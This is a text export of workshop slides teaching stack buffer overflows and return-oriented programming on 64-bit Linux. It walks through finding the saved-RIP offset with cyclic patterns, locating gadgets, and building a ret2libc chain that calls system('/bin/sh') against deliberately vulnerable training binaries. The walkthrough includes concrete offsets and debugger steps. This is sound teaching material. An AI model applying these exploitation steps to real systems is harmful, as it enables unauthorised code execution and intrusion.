IntroToROP_detailed
Introduction to ROP
chiliz
Folie 2
whoami
• Lisa / chiliz
• Student in Automation and Mechatronics (HFU Tuttlingen, Germany)
• Bachelor Thesis at Bosch (Automated Security Testing & Fuzzing)
• CTF Player
• Blackhoodie Attendee in Luxembourg and at Troopers,
Trainer in Berlin
Folie 3
Agenda
• Recap Buffer Overflow
• What is ROP and why do we want it?
This set of slides is meant to be an „offline version“ of the course, so you can read up and
redo the exercises.
I will describe the workflow in the debuggers/terminals in as much detail as possible.
Grey text shows additional/background information (you might know it already, but if
not, it can be helpful).
Folie 4
Important registers:
• RIP: Instruction Pointer
• RSP: Top of the current Stack
Before we get started, a few notes on the 64-bit calling convention on Linux.
The arguments of a function call are passed in the registers RDI, RSI, RDX, RCX, R8 and R9, in exactly
this order.
The return value of a function is stored in RAX.
RIP is the instruction pointer register, and RSP points to the current top of the stack.
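The register order can be written down as a small lookup. This is only an illustrative sketch in Python; the function name assign_registers is made up for this example and is not part of the course material.

```python
# System V AMD64 calling convention: the first six integer/pointer
# arguments are passed in these registers, in this order.
ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def assign_registers(*args):
    """Return a dict showing which register would hold each argument.

    Hypothetical helper for illustration only.
    """
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("further arguments are passed on the stack")
    return dict(zip(ARG_REGISTERS, args))


# strcpy(buffer, input): buffer goes to RDI, input goes to RSI
print(assign_registers("ptr to buffer", "ptr to input"))
```
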
Folie 5
• Call to function
• save return address on the stack to return to it later
• Function gets executed
• return to the address that is saved to the stack
To make this concrete: a function call with two arguments always follows the same procedure.
We move the second argument of the function into RSI.
Then we move the first argument into RDI.
Then the function gets called.
With every call, the address of the instruction after the call (the return address) gets pushed onto the stack, so we can
return to this location after the call.
The function gets executed.
After the function has finished, we return to the address that was saved on the stack.
Execution continues at the location after the call; the return value of the function is stored in RAX.
Folie 6
The program takes input from the user as a command line argument.
That input gets passed to a vulnerable function.
The vuln function copies the input into a local buffer.
Remember, local variables are stored on the stack.
We can give the program more characters than the buffer can hold.
The buffer will overflow.
That's a classic stack buffer overflow.
Let's go through it step by step.
In the middle you see the compiled assembly code, on the right side a sketch of the
current stack, and below it the registers RDI and RSI, which hold the arguments for function calls
in 64 bit.
Folie 7
[Diagram: RDI = ptr to argv[1], RSI not yet set]
Let's start the execution just before the call to the vuln function.
RIP is the instruction pointer register. In reality it always holds the address of the next
instruction that will get executed.
In a debugger, programs can be stepped through like a movie, executing one instruction after
another.
The instruction pointer RIP tells the processor what to execute next.
For convenience, in my diagrams the red RIP pointer always points to the instruction that has just
been executed.
In my diagrams, RIP only has the task of showing the execution flow. I wanted to avoid
complicated, bulky sentences when explaining one instruction after another.
It does not change anything, it is just a convention I chose for the diagrams.
In C, the main function gets two arguments: argc and argv. argc is the argument counter, argv is
an array of strings (char pointers) that holds the arguments. argv[0] is always the name of the program itself.
argv[1] is the first command line argument, in our case the input from the user.
I left out the part where the pointer to argv[1] gets stored in RAX, it is not important for us.
We only need to know that at the start of this program, a pointer to argv[1] is stored in RAX.
We start the execution at the beginning of the main function. In the diagram, RIP points to
„mov rdi, rax“, so this just got executed.
argv[1] points to the input from the user.
Here we see that the pointer to argv[1], that is, the pointer to the user input stored in RAX, just got
moved to RDI.
Folie 8
[Diagram: RDI = ptr to input (argv[1])]
We enter the vuln function and the first thing we do is to save the base pointer RBP to the
stack.
This is part of the function prologue of the vuln function.
Folie 10
[Diagram: RDI = ptr to input (argv[1])]
We reserve space on the stack for the buffer by subtracting 32 from the stack pointer.
Folie 11
[Diagram: RDI = ptr to input (argv[1]), RSI = ptr to input]
Next the arguments for the call to strcpy get stored in RDI and RSI. The second argument for
strcpy, input, gets stored in RSI.
Folie 12
[Diagram: RDI = ptr to buffer, RSI = ptr to input]
Then the first argument of strcpy, the pointer to our buffer, gets stored in RDI.
This is the 64-bit calling convention: the first argument of a function call, here buffer, gets
stored in RDI.
The second argument of that function call, here input, gets stored in RSI.
Folie 13
Program call:
> ./myprogram AAA… (31*A)
[Diagram: RDI = ptr to buffer, RSI = ptr to input]
When strcpy is executed, the input string is copied into the buffer.
This is where it gets interesting.
We see that when strcpy is executed, the input string (31 As) is copied into the buffer.
strcpy copies until it reaches a null byte, and it also copies this null byte.
A command line argument is a C string, so a null byte is automatically appended to it when the
program is started. With 31 As plus the null byte, the 32-byte buffer is filled exactly.
Program call:
> ./myprogram AAA… (56*A)
Recap Buffer Overflow
! Buffer Overflow, we have 32 bytes and write 56 bytes

Source code:
void vuln(char *input)
{
    char buffer[32];
    strcpy(buffer, input);
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
}

Assembly of vuln(char*):
    push rbp
    mov rbp, rsp
    sub rsp, 32
    mov rsi, rdi        ; input
    lea rax, [rbp-32]
    mov rdi, rax        ; buffer
    call strcpy         ; <- RIP
    leave
    ret

Stack (low addresses 0x0000… at the top, high addresses 0x7FFFFF… at the bottom):
    buffer (RSP, top of stack)   AAAAAAAA
                                 AAAAAAAA
                                 AAAAAAAA
                                 AAAAAAAA
    Saved RBP                    AAAAAAAA
    Saved RIP                    AAAAAAAA
                                 AAAAAAAA

Registers: RDI = ptr to buffer, RSI = ptr to input
If the input string is longer than the buffer, strcpy will write beyond the end of the buffer.
In this case, strcpy will also overwrite the saved base pointer, the saved instruction pointer and
maybe more.
We have stored this saved instruction pointer to get it back after the vulnerable function is
finished.
This means it will get used as an instruction pointer again, but now we can control it.
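The effect on the stack frame can be modelled in a few lines of Python. This is only a toy model under stated assumptions: the frame layout (32-byte buffer, saved RBP, saved RIP) follows the slides, while the initial saved RBP and return address values are made up for illustration.

```python
BUF_SIZE = 32


def make_frame():
    """Toy stack frame of vuln(): buffer, saved RBP, saved RIP, 16 spare bytes."""
    frame = bytearray(BUF_SIZE + 8 + 8 + 16)
    frame[32:40] = (0x7FFFFFFFE000).to_bytes(8, "little")  # made-up saved RBP
    frame[40:48] = (0x400600).to_bytes(8, "little")        # made-up return address
    return frame


def strcpy_into_frame(frame, data):
    """Model strcpy: copy all bytes plus the null byte, without bounds check."""
    src = data + b"\x00"
    frame[0:len(src)] = src
    return frame


def saved_rip(frame):
    """Read the 8 bytes of the saved instruction pointer as a number."""
    return int.from_bytes(frame[40:48], "little")


ok = strcpy_into_frame(make_frame(), b"A" * 31)
overflowed = strcpy_into_frame(make_frame(), b"A" * 56)
print(hex(saved_rip(ok)))          # 0x400600, return address untouched
print(hex(saved_rip(overflowed)))  # 0x4141414141414141, overwritten with As
```

With 31 As the copy ends exactly at the end of the buffer; with 56 As the saved RBP and the saved RIP both consist of As.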
Folie 17
We can basically overwrite the saved instruction pointer with anything we want.
One possibility to exploit this situation is to write shellcode into the buffer instead of As.
At the position where the saved instruction pointer is stored, we insert the address of the
buffer, which is the start of our shellcode.
When the function returns, RIP is loaded with the address of our shellcode.
Folie 18
Leave: mov rsp, rbp
       pop rbp
Ret:   "pop rip"
Leave restores the stack pointer and the base pointer to their original positions.
It is part of the function epilogue, which tears down the stack frame of the vuln function.
The next instruction that will be executed is the return instruction.
This instruction will play an important role for return oriented programming.
It basically pops the next value from the stack and writes it into RIP so that execution
continues at the popped address.
Folie 19
In our case this will cause RIP to point to the buffer and changes the control flow to execute
our shellcode. After the shellcode is executed, we get a shell and are done!
To verify that ASLR has been disabled, you can print the value of
/proc/sys/kernel/randomize_va_space
If it is 0, ASLR has been disabled.
> cat /proc/sys/kernel/randomize_va_space
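For reference, the possible values of this file can be interpreted as in the following sketch. The helper name describe_aslr is hypothetical; the meanings of 0, 1 and 2 follow the Linux kernel documentation for randomize_va_space.

```python
def describe_aslr(value):
    """Interpret the content of /proc/sys/kernel/randomize_va_space."""
    meanings = {
        0: "ASLR disabled",
        1: "ASLR enabled (stack, mmap base, vdso)",
        2: "ASLR fully enabled (additionally randomizes the heap)",
    }
    return meanings.get(int(value.strip()), "unknown setting")


# The file content is a single number followed by a newline.
print(describe_aslr("0\n"))
```
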
> ./01_demo_64_bit
Give me the Code:
AAAA
You gave me: AAAA
When we look at the source code again, the data buffer is 20 bytes long, but we read
much more than that: 0x40, which is 64 bytes.
This is a buffer overflow.
Let's verify that by writing more than 20 characters. Let's run it.
> ./01_demo_64_bit
Give me the Code:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
We get a segmentation fault. This means that the program tried to access memory that is
not accessible. We can actually see that in gdb.
What you can see is the peda extension for gdb. It gives a nice overview of the current
state of the program.
At the top you can see all the registers and their current values. In the middle you see the
assembly code that is executed. The arrow shows which instruction is about to get
executed.
At the bottom you can see the current stack. In a 64-bit binary, each line represents 8
bytes of the stack. The first line is the top of the stack.
We can see the program received a SIGSEGV, the signal for a segmentation fault.
This indicates the program tried to access memory that it has no right to access.
We also see that the program crashes at the return instruction. The return
takes the top of the stack and loads it into the instruction pointer.
The top of the stack contains our As, that is 0x4141…
We can see the memory contents of addresses or registers with the x command.
The RSP register is shown in the register overview, but there peda resolves the pointer and shows our string.
With the peda command vmmap you can see all the mapped memory sections.
(If you only have gdb and not an extension like gdb-peda, you can use the command "info
proc mappings").
gdb-peda$ vmmap
0x4141… is not included in any of them.
The program tries to access memory at this address (0x4141…) and gets a segmentation
fault because it has no right to access this memory.
Now the only thing that prevents us from taking control is that the value at the top of the
stack was not a valid address.
The interesting question is: can we set it to an exact value? To do that, we have to know how
many bytes we have to write until we overwrite the instruction pointer.
To be a bit more clear: how many As do I have to write before the top of the stack consists of
exactly 8 Bs? I could find this out by trial and error, but that's not very efficient. Another
idea is to calculate it from the program. There are two problems with this approach: First,
the space that gets reserved on the stack for the buffer is not necessarily the exact size in the
source code. There is likely padding, and it also depends on the compiler.
The second problem is that in bigger functions there are likely operations on the stack
between the buffer overflow (here the read function, or strcpy) and the return
statement. We would have to account for all of them.
A safer and more efficient way to do this is to use a pattern.
Folie 20
[Diagram: the stack overflowed with As; RDI = ptr to buffer, RSI = ptr to input]
This is our current state. Instead of As we now want to overwrite RIP with an exact value.
For this we have to know how many bytes we have to write until we reach the instruction
pointer.
We can do this by using patterns.
Folie 21
Program call:
> ./myprogram AAAAAAAABBBBBBBBCCCCCCCC…
[Diagram: the stack after the overflow. The buffer holds the A to D blocks, the saved RBP is
EEEEEEEE, the saved RIP is FFFFFFFF, followed by GGGGGGGG.]
Fill-buff = 8*"A" + 8*"B" + 8*"C" + 8*"D" + 8*"E"
          = 40 Bytes
We need to add up all the characters before the Fs. This gives us the exact number of
bytes we need to write until we reach the saved instruction pointer.
Here this is 40 bytes in total.
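The same counting can be sketched in Python. The helper names block_pattern and offset_of_block are made up for this example; the pattern is the manual A/B/C… pattern from the slides, with one letter per 8-byte stack slot.

```python
import string


def block_pattern(blocks):
    """AAAAAAAABBBBBBBB...: one distinct letter per 8-byte stack slot."""
    return "".join(letter * 8 for letter in string.ascii_uppercase[:blocks])


def offset_of_block(letter):
    """Number of bytes written before the 8-byte block of `letter` starts."""
    return string.ascii_uppercase.index(letter) * 8


pattern = block_pattern(7)
print(pattern)
print(offset_of_block("F"))  # 40: five blocks (A to E) come before the Fs
```
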
Folie 24
Patterns - RIP control
How many bytes do we have to write until we reach RIP?
Program call:
> ./myprogram AA…(A*40)FFFFFFFF
! Buffer Overflow, RIP is now FFFFFFFF
To set RIP to an exact value, we can now write 40 Bytes and then the value for the instruction
pointer.
However this still feels very manual.
Folie 25
A cyclic pattern is a sequence of characters in which every short subsequence is unique. This can be used to find specific
locations inside the sequence.
We only give the pattern command the length of the pattern, then the pattern is created. For a given length, the
cyclic pattern that is created is always the same.
Folie 26
[Diagram: the stack is filled with the cyclic pattern]
We see that the instruction pointer is now overwritten with a unique sequence of characters.
Folie 27
Pattern: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA …
Sequence that overwrote RIP: AA0AAFAA
We can now look for this unique sequence that overwrote RIP. gdb-peda does this for us using
pattern matching.
Peda takes the pattern that it created and searches it for the part of the pattern that we give to it.
Folie 28
[Diagram: peda compares the sequence AA0AAFAA with the pattern
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGA … position by position]
Match!
Offset: 40
Folie 30
When peda finds the unique sequence in the cyclic pattern, it gives us the offset of the
unique sequence.
This is exactly what we want:
the number of bytes until we reach the instruction pointer, which currently holds the unique sequence.
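The idea behind pattern creation and offset search can be sketched as follows. Note the assumptions: this is not peda's algorithm. It uses a simpler, well-known scheme of three-character groups (Aa0Aa1Aa2…), and the function names are made up for illustration.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length):
    """Build a pattern of unique 3-character groups: Aa0Aa1Aa2...

    Works for lengths up to 26 * 26 * 10 * 3 characters.
    """
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length]


def pattern_offset(pattern, needle):
    """Return the position of `needle` inside the pattern, or -1."""
    return pattern.find(needle)


pattern = cyclic_pattern(100)
rip_value = pattern[40:48]  # pretend these 8 bytes ended up in the saved RIP
print(pattern_offset(pattern, rip_value))  # 40
```

Because every 8-character window of the pattern occurs only once, the position of the window that landed in RIP directly gives the number of fill bytes.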
gdb-peda$ vmmap
(If you don’t see all memory sections, you need to run the program and break the
execution:
- Either set a breakpoint in main and then run (b main, run) or
- Run the program and press ctrl + c to stop at any point (run, ctrl + c))
The line near the bottom shows the stack section, and the third column contains the
access permissions.
We have read and write permissions, but we don’t have execute permissions.
So when we write shellcode to the stack, we can't execute it.
If you look closely, there is no section that has both write and execute permissions.
This security mechanism has many different names, for instance “data
execution prevention” (DEP), or NX, for “no execute”.
This is where ROP comes into play.
Folie 31
Code Reuse
#include <stdio.h>
#include <unistd.h>

void win()
{
    printf("Congratulations!\n");
    execve("/bin/sh" ..);
}

int main()
{
    char buffer[20];
    printf("Enter some text:\n");
    scanf("%s", buffer);
    return 0;
}
Imagine we have this little program. Even with a non-executable stack we could jump to the
win function and get a shell.
In this case, the win function would do the exact same thing as our shellcode. So we can just
reuse this code that is already in the binary and can be executed.
Folie 34
Code Reuse
What can we do when there is no win function?
libc (Standard C library) always has a win function: system
Goal: system("/bin/sh")
The libc (standard C library) always has a win function: it is called system.
system will execute whatever command we give to it. So when we give the string "/bin/sh" as an
argument to system, we get a shell. So the goal is to call system("/bin/sh").
Folie 36
The libc is the standard C library. It implements the C standard functions (like printf,
strcpy, ...) and POSIX functions (system, wrappers for syscalls).
Under Linux it is compiled as a shared object (.so). One of its header files is the famous
stdio.h.
libc.so.6 is a symlink to the installed libc version (for example libc-2.28, where 2.28
is the version number).
You can find the libc that got linked to the binary with gdb->vmmap or ldd.
The path is most often /usr/lib/libc-2.28
Source code can be compiled as either executables or shared objects. Libraries are compiled
to shared objects.
stdio.h is one of the header files of the libc source code.
Folie 37
Ret2libc
Approach:
• Find Buffer Overflow
• Use it to overwrite a stored return address with the address of a
function in the libc (e.g. system)
• The libc function will be executed when the vuln function returns
=> Ret2libc (simple and special case of ROP)
Let's look at the interesting thing for us: how system expects to be called in 64 bit:
Folie 39
We see that for 64 bit the argument, the address to the string /bin/sh gets stored in RDI
before the call to system.
Folie 40
Like with every function call, the saved instruction pointer gets pushed to the stack, so after
the function is completed, execution can continue.
Folie 41
Payload strategy
[Diagram: the vuln function from before, with RIP at its ret. The saved RIP on the stack is
overwritten with the address of system. What has to follow on the stack and what has to be
in RDI is still open (???).]
Leave: mov rsp, rbp
       pop rbp
Ret:   "pop rip"
[1] https://www.wired.com/2007/07/weekly-world-ne/
Building ROP chains is much like making a blackmail letter out of old newspapers.
For example, you can take this strange newspaper headline „hackers can turn your home
computer into a bomb” and turn it into something that you actually want to say.
Folie 43
- Take snippets from the binary
- glue them together
- get the wanted code
Snippets from vuln_binary:
(mov rax, 1; ret) + (mov rbx, 2; ret) + (pop rdi; ret)
You can see that all the snippets end with a return statement.
That's the return in return oriented programming, and that's the glue to chain the code
snippets together.
How does that work? Let's look at a quick example:
Folie 45
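Building ROP-chains
(„ret“ = pop RIP)
Gadgets in the binary:
    0x400111: mov rax, 1; ret
    0x400222: mov rbx, 2; ret
    0x400333: pop rdi; ret
Stack (low addresses 0x0000… at the top, high addresses 0x7FFF… at the bottom):
    …           AAAAAAAA
    Saved RIP   0x400111   <- RSP
                0x400222
                0x400333
                0xC0FFEE
                0x400444
Registers: RAX, RBX and RDI are not set yet.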
Let's see how we can put our gadgets into a chain by overflowing the buffer.
On the left you can see the three code snippets from our binary, which all end in a return
statement.
They can be taken from any executable section inside the binary.
They are just code from the binary. We refer to them as ROP gadgets.
But remember, we cannot write the ROP gadgets ourselves, we can only use what is already
there.
On the right side you can see the current stack, where our payload has already overflowed the
buffer.
As usual, our payload starts with As.
This time we have overwritten the saved return address with the address of the first gadget in
the chain.
Folie 46
[Diagram: unchanged from the previous slide; RSP points to the saved RIP, which holds 0x400111]
When the vulnerable function returns, execution continues at the beginning of the first
gadget.
This will move the value 1 into RAX.
Folie 47
[Diagram: RIP is at „mov rax, 1“ (0x400111), RSP points to 0x400222, RAX = 1]
[Diagram: RSP points to 0x400222, RAX = 1]
The return at the end of the gadget pops the next value from the stack, 0x400222, into RIP.
That’s super useful for us, because we as attackers only have control over the stack.
But with a return statement, we also have control over the instruction pointer again!
[Diagram: RIP is at „mov rbx, 2“ (0x400222), RAX = 1, RBX = 2]
[Diagram: RIP is at the „ret“ of the second gadget, RAX = 1, RBX = 2]
The return of this gadget takes the address of the third gadget from the stack and
continues execution there.
As we can see, this third gadget also takes another value from the stack and pops it into RDI.
Folie 51
[Diagram: RIP is at „pop rdi“ (0x400333), RSP points to 0xC0FFEE, RAX = 1, RBX = 2]
So it is even possible to provide our gadgets with arguments if they take them from the stack, like
pop instructions do.
This is incredibly useful: remember, in our case we need the address of the string "/bin/sh" in
the RDI register.
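The walk through the chain can be replayed with a toy emulator. This is a sketch only: the gadget addresses and stack values are the made-up ones from the slides, and the emulator understands just the three instruction kinds used there.

```python
# Gadgets from the slides: address -> list of instructions
GADGETS = {
    0x400111: [("mov", "rax", 1), ("ret",)],
    0x400222: [("mov", "rbx", 2), ("ret",)],
    0x400333: [("pop", "rdi"), ("ret",)],
}


def run_chain(stack):
    """Execute a ROP chain; stack[0] is the overwritten saved RIP."""
    regs = {"rax": None, "rbx": None, "rdi": None}
    stack = list(stack)
    rip = stack.pop(0)  # the ret of the vulnerable function ("pop rip")
    while rip in GADGETS:
        for instruction in GADGETS[rip]:
            if instruction[0] == "mov":
                regs[instruction[1]] = instruction[2]
            elif instruction[0] == "pop":
                regs[instruction[1]] = stack.pop(0)  # value comes from the stack
            elif instruction[0] == "ret":
                rip = stack.pop(0)                   # next gadget address
    return regs, rip


chain = [0x400111, 0x400222, 0x400333, 0xC0FFEE, 0x400444]
regs, rip = run_chain(chain)
print(regs)      # {'rax': 1, 'rbx': 2, 'rdi': 12648430}  (12648430 == 0xC0FFEE)
print(hex(rip))  # 0x400444, where execution would continue next
```

The emulator stops at 0x400444 because that address is not one of the three known gadgets.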
Where do we get the ROP gadgets from, though? There are tools to find them, for example
ROPgadget or ropper. We can try this on our binary:
We can see there are many gadgets, and all of them end either with a return statement, a
jump or a call. It is a bit strange that we can not see those instructions while disassembling.
Folie 52
x86 – ROPgadget
Why is there code we don‘t see while disassembling?
When we run the command ROPgadget, why is there code we don‘t see while
disassembling?
Folie 53
push 0x11c35faa
Take for example the following instruction, which pushes that immediate value onto the stack.
It translates to the following bytes: 68 aa 5f c3 11
The opcode of the push instruction for an immediate value is 0x68, and the immediate value is stored in little
endian.
An interesting fact about the Intel architecture is that instructions do not have a
fixed size, in contrast to, for example, the ARM architecture.
So on the Intel architecture there are instructions that are only 1 byte long, but
also instructions that are many bytes long.
Instructions also do not have to be aligned in memory, so an instruction can begin at an
arbitrary address.
Folie 54
If you jump with the instruction pointer not to the beginning of this instruction, but into
the middle of it, the bytes 5f c3 will be interpreted as this: pop rdi; ret
Folie 55
This means that even uninteresting instructions can turn into an interesting ROP gadget
when they contain the byte 0xc3, because that is the opcode for return.
The tool ROPgadget looks for this in an automated way, and this is why we find so many
gadgets we don't see when just looking at the disassembled code.
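The hidden gadget in the push instruction can be reproduced in a few lines. This sketch is not a disassembler: the lookup table only knows the two one-byte opcodes needed for this example, and decode_from is a made-up helper name.

```python
import struct

# push imm32: opcode 0x68 followed by the 32-bit immediate in little endian
code = b"\x68" + struct.pack("<I", 0x11C35FAA)
print(code.hex())  # 68aa5fc311

# Tiny lookup table, only for the two one-byte opcodes of this example
ONE_BYTE_OPCODES = {0x5F: "pop rdi", 0xC3: "ret"}


def decode_from(data, start):
    """Decode known one-byte instructions from `start` up to the first ret."""
    decoded = []
    for byte in data[start:]:
        if byte not in ONE_BYTE_OPCODES:
            break
        decoded.append(ONE_BYTE_OPCODES[byte])
        if byte == 0xC3:
            break
    return decoded


# Starting two bytes into the push instruction yields a usable gadget
print(decode_from(code, 2))  # ['pop rdi', 'ret']
```
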
Folie 56
Payload Strategy
[Diagram: the vuln function from before. The saved RIP is overwritten with the pointer to the
„pop rdi; ret“ gadget, followed by the pointer to „/bin/sh“.]
To get the argument for system into RDI, our first ROP gadget is the pop rdi gadget.
Let's look at what happens if we hit the return now, with this state of the stack:
Folie 57
Payload Strategy
[Diagram: RIP is at the ret of vuln. RSP points to the saved RIP, which holds the pointer to the
„pop rdi; ret“ gadget, followed by the pointer to „/bin/sh“.]
The return, as I explained, pops the next value from the stack and loads it into the
instruction pointer register, so execution will continue there. In our case that is the pop rdi
gadget.
Folie 58
Payload Strategy
[Diagram: RIP is at „pop rdi“. RDI = ptr to „/bin/sh“, RSP points to the pointer to system.]
The pop rdi code snippet pops the next value from the stack into the RDI register.
In this case this is the pointer to /bin/sh.
Folie 59
Payload Strategy
[Diagram: RIP is at the „ret“ of the gadget. RDI = ptr to „/bin/sh“, RSP points to the pointer to system.]
When we hit the return of the gadget, it will take the next value on the stack and load it into
the instruction pointer register.
In this case this is system. System expects its argument in the RDI register, which now holds the
pointer to /bin/sh.
Folie 60
Payload Strategy
[Diagram: RIP is at the start of system, RDI = ptr to „/bin/sh“]
Now system gets executed with the string „/bin/sh“ as argument, and after this, we get a
shell.
Folie 61
If we put all this together, we can now apply this concept to our exercise:
First we have our As to fill up the buffer and overflow up to the saved instruction pointer.
Folie 62
Then we have the address of our first gadget: that's pop rdi; ret.
Folie 63
[Diagram: payload so far: As (the saved RBP is overwritten with AAAAAAAA)
+ address of the „pop rdi; ret“ gadget
+ address "/bin/sh" [value that gets popped into RDI]]
Next we put the address of “/bin/sh”, and this will get popped by the first gadget into RDI.
The pop gadget always needs an argument that comes right after it.
So they always come together.
Finally we put the address of system, which is our second and final gadget for now.
Folie 64
[Diagram: complete payload: As (the saved RBP is overwritten with AAAAAAAA)
+ address of the „pop rdi“ gadget [ROP gadget, overwrites the saved RIP]
+ address "/bin/sh" [value that gets popped into RDI]
+ address of system]
Now system gets executed, and system takes its argument from RDI, which we just set.
[Diagram: memory layout of the process (.text, heap, …)]
We still need the absolute addresses of system and of the string “/bin/sh”. We can calculate them like this: we get the absolute address of system when we take the
base address of the libc and add the offset of system inside the libc.
The string “/bin/sh” is present inside the libc, because some functions use it too.
We also get the address of that “/bin/sh” string by taking the libc base address and
adding the offset of the string inside the libc.
Folie 66
libc base address: vmmap
absolute address of system (if ASLR is disabled): p system
absolute address of “/bin/sh” (if ASLR is disabled): searchmem /bin/sh
There are various ways to determine the address of the libc base and the offsets of system and /bin/sh.
There are command line tools like ldd, readelf or strings.
Of course you can always open the libc in a disassembler like Hopper or IDA to get the same
information.
We will use the command line tools and vmmap for now.
I also included this section in the cheat sheet.
I prepared a template to create our payload, to give it a bit of a logical structure.
(open create_payload.py in the folder of the first demo)
The first XXX we can already fill in: we already determined with the pattern in peda that we
need 40 As until we reach the saved instruction pointer.
FILLBUF = 40
LIBC_BASE = 0x7ffff7a0d000
We can get the offset of system inside the libc with the command line tool readelf and the
option -s, applied to the libc that is loaded. readelf gives information about ELF files (Executable and Linkable
Format), and the -s option stands for symbols.
The path of the libc we get either from ldd or vmmap. It is important that we use the libc that the
program uses, so you need to run either ldd or vmmap before you look for this offset.
Because this produces a lot of output, we can search the output for system with the command
“grep”.
This will give us 3 output lines, but the first line is a different symbol (systemerr), and the second and
third lines have the same offset.
OFFSET_SYSTEM = 0x45390
Next we determine the offset of the string “/bin/sh” inside the libc.
For this we can use the strings command, which shows all the strings in a binary.
The option -tx shows the offset of each string in hex.
The path of the libc we get either from ldd or vmmap. Because this produces a lot of output,
we can search the output for the string “/bin/sh” with the grep command.
OFFSET_BIN_SH = 0x18cd57
The third step in the script is to get the address of the ROP gadget “pop rdi; ret”.
We can use the tool ROPgadget for this. With the option --binary we specify the binary, which is
in our case our program 01_demo_64_bit. This produces a lot of output:
We can now determine the absolute address of system by taking the libc base address and adding
the offset of system within the libc to it:
address_system = LIBC_BASE + OFFSET_SYSTEM
and the same for the absolute address of the string “/bin/sh”:
address_bin_sh = LIBC_BASE + OFFSET_BIN_SH
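With the values determined above, the calculation can be checked quickly in Python. The resulting addresses are only valid for the libc and memory layout of the workshop machine, with ASLR disabled.

```python
LIBC_BASE = 0x7ffff7a0d000   # from vmmap
OFFSET_SYSTEM = 0x45390      # from readelf -s
OFFSET_BIN_SH = 0x18cd57     # from strings -tx

# absolute address = libc base address + offset inside the libc
address_system = LIBC_BASE + OFFSET_SYSTEM
address_bin_sh = LIBC_BASE + OFFSET_BIN_SH

print(hex(address_system))  # 0x7ffff7a52390
print(hex(address_bin_sh))  # 0x7ffff7b99d57
```
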
The final step for this exercise is to assemble the payload and build the ROP chain.
Can you remember the order in which the payload needs to be structured?
First we fill up the buffer with 40 As until we reach the return address.
Before we call system, we need to put the address of the string “/bin/sh” into the RDI register.
For this we can use the “pop rdi” gadget, so we overwrite the saved instruction pointer with
the address of our first ROP gadget.
Addresses in the payload need to be written in little endian. Pwntools has a nice
built-in function that does this for us: p64(), which packs a 64-bit value.
The “argument” for the “pop rdi” gadget is the address of the string “/bin/sh”, so this needs to go next.
Once we have the address of “/bin/sh” in the RDI register, we want to call system, so the last piece
of our chain is the absolute address of system:
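As a rough sketch of what the assembled chain could look like, here is a version that only uses the Python standard library. Assumptions: the local p64 helper mimics pwntools' p64() with struct, and ADDR_POP_RDI is a hypothetical placeholder that has to be replaced with the address ROPgadget reports for your binary. This is not the workshop's create_payload.py template.

```python
import struct


def p64(value):
    """Pack a 64-bit value in little endian (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


FILLBUF = 40
LIBC_BASE = 0x7ffff7a0d000
OFFSET_SYSTEM = 0x45390
OFFSET_BIN_SH = 0x18cd57
ADDR_POP_RDI = 0x400743  # hypothetical value, take the real one from ROPgadget

payload = b"A" * FILLBUF                   # fill up to the saved RIP
payload += p64(ADDR_POP_RDI)               # first gadget: pop rdi; ret
payload += p64(LIBC_BASE + OFFSET_BIN_SH)  # value popped into RDI
payload += p64(LIBC_BASE + OFFSET_SYSTEM)  # the gadget's ret jumps to system

# Shown as hex for inspection; a real script would write the raw bytes,
# for example with sys.stdout.buffer.write(payload).
print(payload.hex())
```
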
We can now save and run the script. It will print our assembled payload, which we can give
to our program.
However, we don’t get a shell, we get a segmentation fault. Have we done anything wrong?
Let's look at it in gdb. For this it is easiest to save the payload to a file:
> ./create-payload.py > payload.bin
To examine what went wrong with the exploit, always set a breakpoint at the return!
Because this is the point where you see whether the payload is on the stack the way it should be.
If you see that the payload is already wrong, you might have missed something that destroys
your payload and that you need to take into account.
If it is the way you wanted it to be, you can now debug it step by step to see what is wrong.
To set a breakpoint at the return, you can first disassemble the function with the command
“disas” as follows:
You can run the program and give it the payload like this:
gdb-peda$ run < payload.bin
We see that we are at the return statement now, and at the top of the stack we see our ROP chain as
we wanted it to be: the “pop rdi” gadget, the address of the string “/bin/sh”, and the address of
system. This looks good. We can now step one instruction further with ni. When we step further now,
we see the address of the string “/bin/sh” in RDI, and system will get executed (the arrow points to
the first instruction of system).
Our payload works. We can continue now, otherwise we would only step through the system function,
which is a very long function. We can continue with the command c:
We see that /bin/dash gets executed (/bin/sh is just a symlink to the default shell; on Ubuntu, dash is
the default shell).
The first execution, process 4210, happens because we call system, and system internally executes /bin/dash
too.
So the /bin/dash at process 4210 is from system, not our “/bin/sh”.
But we also see that in process 4211 /bin/dash gets executed, but exits immediately.
/bin/dash does not receive anything from stdin and so it exits.
So we get a shell, but because the shell does not receive anything from stdin, it closes immediately.
There is a neat trick with the cat command to avoid this problem. Cat with a dash can hold stdin
open!
You can try this:
> cat payload.bin -
You should be able to still type.
We can use this for our exploit, so that the shell does not close immediately:
> cat payload.bin - | ./01_demo_64_bit
Attention: To prevent you from simply copying the offsets, I linked this exercise against a different libc.
To run the program, you need to specify the libc that is used and the linker.
Change to the directory of the second exercise (/02_demo/).
You can use the following command to run the program (every “/” is necessary here):
For the address of the libc base you have to use gdb->vmmap this time!
ldd does not work here.
To run the program in gdb, run the following commands:
[Slide diagram: process memory layout with .text at 0x400000, heap, and libc]
Now, the third exercise of the workshop will be with ASLR enabled.
ASLR stands for Address Space Layout Randomization and it is a system-wide security
mechanism.
ASLR is turned on by default on nearly every modern system nowadays.
As we know, our running program has different sections: the text section, which
contains the code, the heap, shared libraries like the libc, and the stack.
With ASLR the base addresses of all those sections are randomized, like this.
All sections start at random addresses now.
Folie 68
• ASLR: Address Space Layout Randomization
• System-wide security mechanism
• Base addresses of each section are randomized
• With each execution of the program, addresses change unpredictably for an attacker
[Slide diagram: process memory layout with .text at 0x400000, heap, libc, and stack]
This will break the exploit of our last two exercises, because we can no longer look up the base
